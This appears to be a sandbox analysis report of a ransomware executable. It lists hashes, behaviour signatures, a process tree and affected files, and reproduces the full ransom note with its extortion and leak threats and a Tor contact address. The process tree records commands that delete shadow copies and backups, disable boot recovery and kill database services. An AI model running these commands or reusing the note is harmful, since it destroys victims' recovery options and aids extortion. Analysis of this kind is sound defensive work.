Analysis

  • max time kernel
    152s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-10-2023 14:03

General

  • Target

    IN.exe

  • Size

    340KB

  • MD5

    714870c33ba84e744b84b32e6e114ed9

  • SHA1

    840f442d4466713becdf72b88846871330ac38e7

  • SHA256

    51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51

  • SHA512

    270c584cc9f696de3421429627a07bfbd7829a033cfdc16280e7e233e8ae09e2f1cd0341537a6b050811683d93a14a1465aa3ab96e9577c98ebea521faae65f2

  • SSDEEP

    6144:PNs9prB0CnszdPZxMzk1ukSXa9bnuDOeFdGpBP7ENf3zcfUE:y9RaPZxMzk1uBXa9bu2JeAfUE

Malware Config

Extracted

Path

C:\odt\HOW_TO_BACK_FILES.html

Ransom Note
<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">{{IDENTIFIER}}</span> <br> <!-- !!! dont changing this !!! --> </div> </div> <!-- --> <div class="tabs"> <!--tab--> <div class="tab"> <div id="tab-content1" class="content"> <div class="text"> <!--text data --> <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. 
This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>Contact us for price and get decryption software.</b><br><br> <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br> * Note that this server is available via Tor browser only<br><br> Follow the instructions to open the link:<br> 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.<br> 2. Press "Download Tor", then press "Download Tor Browser Bundle", install and run it.<br> 3. Now you have Tor browser. In the Tor Browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. Start a chat and follow the further instructions. <br> <hr> <b>If you can not use the above link, use the email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div> <!--tab--> <!--text data --> </div> </div> <!--tab--> </div> </div> </body> </html>

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (4413) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    PID:3192
      • C:\Users\Admin\AppData\Local\Temp\IN.exe
        "C:\Users\Admin\AppData\Local\Temp\IN.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Enumerates connected drives
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:4772
        • C:\Windows\SysWOW64\cmd.exe
          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill \"SQL\"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1228
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c rem Kill \"SQL\"
              4⤵
              PID:5032
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3640
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4196
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlbrowser.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:332
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1848
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2288
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sql writer.exe
                5⤵
                • Kills process with taskkill
                PID:2608
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1760
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3692
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlserv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4944
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2392
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4280
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im msmdsrv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4028
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1280
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im MsDtsSrvr.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:232
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3156
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlceip.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4476
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4872
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3812
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im fdlauncher.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3880
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4276
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3872
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im Ssms.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4928
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
            3⤵
            PID:2232
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
              4⤵
              PID:3472
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im SQLAGENT.EXE
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2044
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
            3⤵
            PID:1524
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
              4⤵
              PID:220
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im fdhost.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2320
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
            3⤵
            PID:5084
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
              4⤵
              PID:788
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
            3⤵
            PID:1592
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
              4⤵
              PID:2692
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
            3⤵
            PID:916
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
              4⤵
              PID:1796
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im pg_ctl.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4452
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
            3⤵
            PID:2276
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
              4⤵
              PID:2876
              • C:\Windows\system32\taskkill.exe
                taskkill -f -impostgres.exe
                5⤵
                • Kills process with taskkill
                PID:3152
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
            3⤵
            PID:3932
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
              4⤵
              PID:2336
              • C:\Windows\system32\net.exe
                net stop MSSQLServerADHelper100
                5⤵
                PID:3732
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop MSSQLServerADHelper100
                  6⤵
                  PID:3180
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
            3⤵
            PID:4348
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
              4⤵
              PID:1616
              • C:\Windows\system32\net.exe
                net stop MSSQL$ISARS
                5⤵
                PID:4944
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop MSSQL$ISARS
                  6⤵
                  PID:4128
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
            3⤵
            PID:1764
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
              4⤵
              PID:3188
              • C:\Windows\system32\net.exe
                net stop MSSQL$MSFW
                5⤵
                PID:4028
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop MSSQL$MSFW
                  6⤵
                  PID:3480
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
            3⤵
            PID:3780
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
              4⤵
              PID:3468
              • C:\Windows\system32\net.exe
                net stop SQLAgent$ISARS
                5⤵
                PID:4008
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop SQLAgent$ISARS
                  6⤵
                  PID:4308
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
            3⤵
            PID:440
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
              4⤵
              PID:4604
              • C:\Windows\system32\net.exe
                net stop SQLAgent$MSFW
                5⤵
                PID:1464
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop SQLAgent$MSFW
                  6⤵
                  PID:824
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
            3⤵
            PID:648
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
              4⤵
              PID:2252
              • C:\Windows\system32\net.exe
                net stop SQLBrowser
                5⤵
                PID:464
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop SQLBrowser
                  6⤵
                  PID:2812
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
            3⤵
            PID:4132
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
              4⤵
              PID:2332
              • C:\Windows\system32\net.exe
                net stop REportServer$ISARS
                5⤵
                PID:1696
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop REportServer$ISARS
                  6⤵
                  PID:2460
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
            3⤵
            PID:4672
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
              4⤵
              PID:220
              • C:\Windows\system32\net.exe
                net stop SQLWriter
                5⤵
                PID:4152
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop SQLWriter
                  6⤵
                  PID:3876
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
            3⤵
            PID:980
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
              4⤵
              PID:1300
              • C:\Windows\system32\wbadmin.exe
                wbadmin delete backup -keepVersion:0 -quiet
                5⤵
                • Deletes system backups
                PID:2196
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
            3⤵
            PID:544
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
              4⤵
              PID:4452
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /All /Quiet
                5⤵
                • Interacts with shadow copies
                PID:3204
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
            3⤵
            PID:3288
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
              4⤵
              PID:916
              • C:\Windows\system32\bcdedit.exe
                bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                5⤵
                • Modifies boot configuration data using bcdedit
                PID:1488
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
            3⤵
            PID:1868
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                    4⤵
                                                                                                                      PID:3676
                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                        bcdedit.exe /set {default} recoverynabled No
                                                                                                                        5⤵
                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                        PID:2584
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                    3⤵
                                                                                                                      PID:5084
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                        4⤵
                                                                                                                          PID:2876
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                                                                            5⤵
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4480
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                        3⤵
                                                                                                                          PID:4120
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                          3⤵
                                                                                                                            PID:4320
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                              4⤵
                                                                                                                                PID:4752
                                                                                                                                • C:\Windows\system32\wbadmin.exe
                                                                                                                                  wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                  5⤵
                                                                                                                                  • Deletes System State backups
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:2336
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IN.exe
                                                                                                                            \\?\C:\Users\Admin\AppData\Local\Temp\IN.exe -network
                                                                                                                            2⤵
                                                                                                                            • Adds Run key to start application
                                                                                                                            • System policy modification
                                                                                                                            PID:4156
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill -f -im ReportingServicesService.exe
                                                                                                                          1⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2176
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill -f -im msftesql.exe
                                                                                                                          1⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1224
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                          1⤵
                                                                                                                            PID:2152
                                                                                                                            • C:\Windows\system32\wbadmin.exe
                                                                                                                              wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                              2⤵
                                                                                                                                PID:3756
                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3396

Network

MITRE ATT&CK Enterprise v15

Downloads


                                                                                                                              aa78502d4f8522f55aaaa226fcb33f2b8b23a4cd

                                                                                                                              SHA256

                                                                                                                              656e1e8e0e37dffd0fa5496f13b3329510c4d69a981a0c1b9e93bdcf60351ee5

                                                                                                                              SHA512

                                                                                                                              fee9fc978414fba3a85eff78a2a60f305ec7c0ce085b871d9ccf54e666d2b61d1fd8faeb9496bfe8be081271d12d89f9b6f4d447b1928242f7565b782b238324

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_F_COL.HXK

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              2e073ac53a2314755ea00e78b3fa2763

                                                                                                                              SHA1

                                                                                                                              bd48bf0a80a70c4ed0d2ec88a315df7f0b964ff3

                                                                                                                              SHA256

                                                                                                                              f3d1d5125c5a8f794dc5ae0cc1229d69dcef6861b490f61b1937da4f57bb2acd

                                                                                                                              SHA512

                                                                                                                              4d283bc2c8145d84de597733e2fccb579d0d51028f09b49061b5d75b68a76b5acc0767458248d8e35bfdf325bddc7fbed28a57f77f6f1c0f2df9284d68536f9b

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_K_COL.HXK

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              ed47191157d21d3c844b9bdbb949f3ea

                                                                                                                              SHA1

                                                                                                                              b47ec4423063693d6af4fd44ffebef995da1865e

                                                                                                                              SHA256

                                                                                                                              2d234711e173873237c80142872c71fb805f9727ed68fe5a1a14bd062e95deb1

                                                                                                                              SHA512

                                                                                                                              db4d3814106e1da285ce319ffbe6bdede012978d3b64ff8729bb9241c028c969f304a61e8cb56dd7b9a12eb11e9f34b03ffc61d8d22780c6664d18cc9d407828

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe.config

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              cf9b6b0ec15b730323e23b4054a0ae0d

                                                                                                                              SHA1

                                                                                                                              423ce19fe8e176e11fa5093556a365ec609faa4b

                                                                                                                              SHA256

                                                                                                                              0ace23bc9e265043709195e6acd77abd01d9334c0c25e0e3dcf9fad2037ac4df

                                                                                                                              SHA512

                                                                                                                              0451ebd1dfec4415e513887ddf05c7577246095d90605729bfb8164d86c8ee11d6601cb0a7fa248e7a6c3c9d4f2b7d385c50bf82e2655bbfe3d41c27bc0cd3b7

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\SIST02.XSL

                                                                                                                              Filesize

                                                                                                                              246KB

                                                                                                                              MD5

                                                                                                                              87f73a28d3a04f54daf361e764776bda

                                                                                                                              SHA1

                                                                                                                              d52485be9dd300cd5293e480cf8a5bd7942e0b43

                                                                                                                              SHA256

                                                                                                                              78f99c3155154052f3f2467a14542550dffaa1e028b1dc7505e62973e04a4cb5

                                                                                                                              SHA512

                                                                                                                              80dedcc3b71b67c276eb8f8710d496e64e1937de3aeded38a666a327111b9173209faff88aadc56ed525e40b739a6291954b22ebea30a359041756d1f6cdf657

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\PROOF\msgr8fr.dub.infected

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              6ad824473d09e175c531dc9875be522c

                                                                                                                              SHA1

                                                                                                                              93b9a532c95295e385c2dc9a17fb36f48af6092c

                                                                                                                              SHA256

                                                                                                                              955bdac0ab3eb391068cc2446095d694dd26b66f52f9147c0e92aa23d6b36acf

                                                                                                                              SHA512

                                                                                                                              1b88eae97a8906f1ecc14b010eda4907a0fc246cae0aeeda5554ed2994adf9097a39dc65a178d6b302ca34114454f720d5589924b819b8fd4adb679eca13f9a3

                                                                                                                            • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmdp64.msi

                                                                                                                              Filesize

                                                                                                                              2.4MB

                                                                                                                              MD5

                                                                                                                              e561ffaeaa34f8b31ba37ef1d7eebb9c

                                                                                                                              SHA1

                                                                                                                              247ce123ffe096e51700c9a732f2a94357a8afb7

                                                                                                                              SHA256

                                                                                                                              f4fc6409b91f149f0e9b10082e1bd26f14664d4cce0b661581edf4f5900521ef

                                                                                                                              SHA512

                                                                                                                              e38896eae49db6a549066fdcbbd3299688bfd3412ba9f0d3f9e976856038f2eda92140544a85dd68bf255ca42726c1b3985fe9606a65a84a484e08350b90e201

                                                                                                                            • C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo

                                                                                                                              Filesize

                                                                                                                              609KB

                                                                                                                              MD5

                                                                                                                              669b3d340709b21e3bd793ffe3ba5458

                                                                                                                              SHA1

                                                                                                                              82db99cc8b6c2b556b3167b6e8d9015dc24a863e

                                                                                                                              SHA256

                                                                                                                              a02f53728436b57056c675b283e7af40191067ad83b6ac5362cf2ffb0c80730b

                                                                                                                              SHA512

                                                                                                                              74f9dd6f898273f9c40ad0ea5d7e8473c0792221c750ccd82a51e7657adfd0a9776d463c288f4815690a8fa5225aee8aa57fdcb208bc940e9587c3c1ded9ec9b

                                                                                                                            • C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo

                                                                                                                              Filesize

                                                                                                                              785KB

                                                                                                                              MD5

                                                                                                                              21a50a201e4cde6353f7d43f27b7a9d1

                                                                                                                              SHA1

                                                                                                                              b1e362b0f7044cfa5ae8e264f6e1c6514b329c1e

                                                                                                                              SHA256

                                                                                                                              b9e2cb4ec22edf971bd67f8cd37609b4194cd52f26d2a364831f8fbda2f52e53

                                                                                                                              SHA512

                                                                                                                              26a05a3fd228c680fdd978aede5982b24642b1fb8305424937cc42cf30b571e0031ecb398692055501899e369614e44f97f7b5bd98856e01069311045f1bbe35

                                                                                                                            • C:\odt\HOW_TO_BACK_FILES.html

                                                                                                                              Filesize

                                                                                                                              3KB

                                                                                                                              MD5

                                                                                                                              a8514fd9f3a52ab2a00f57494d03b2fe

                                                                                                                              SHA1

                                                                                                                              0e204aabbd8b5d6ee1b36d10429d65eb436afd14

                                                                                                                              SHA256

                                                                                                                              056ae301d1686bbf2355fd96ef3363e2b18d593f58f912498d87de3569fa9028

                                                                                                                              SHA512

                                                                                                                              6250481712b51d19e13bf148e3cb046fbf669398b06f8ce757a8583a0fec36ca22140cb90d4706a731f27d1419795ff37ec079d170e15e9e2985020c1e6a1d5b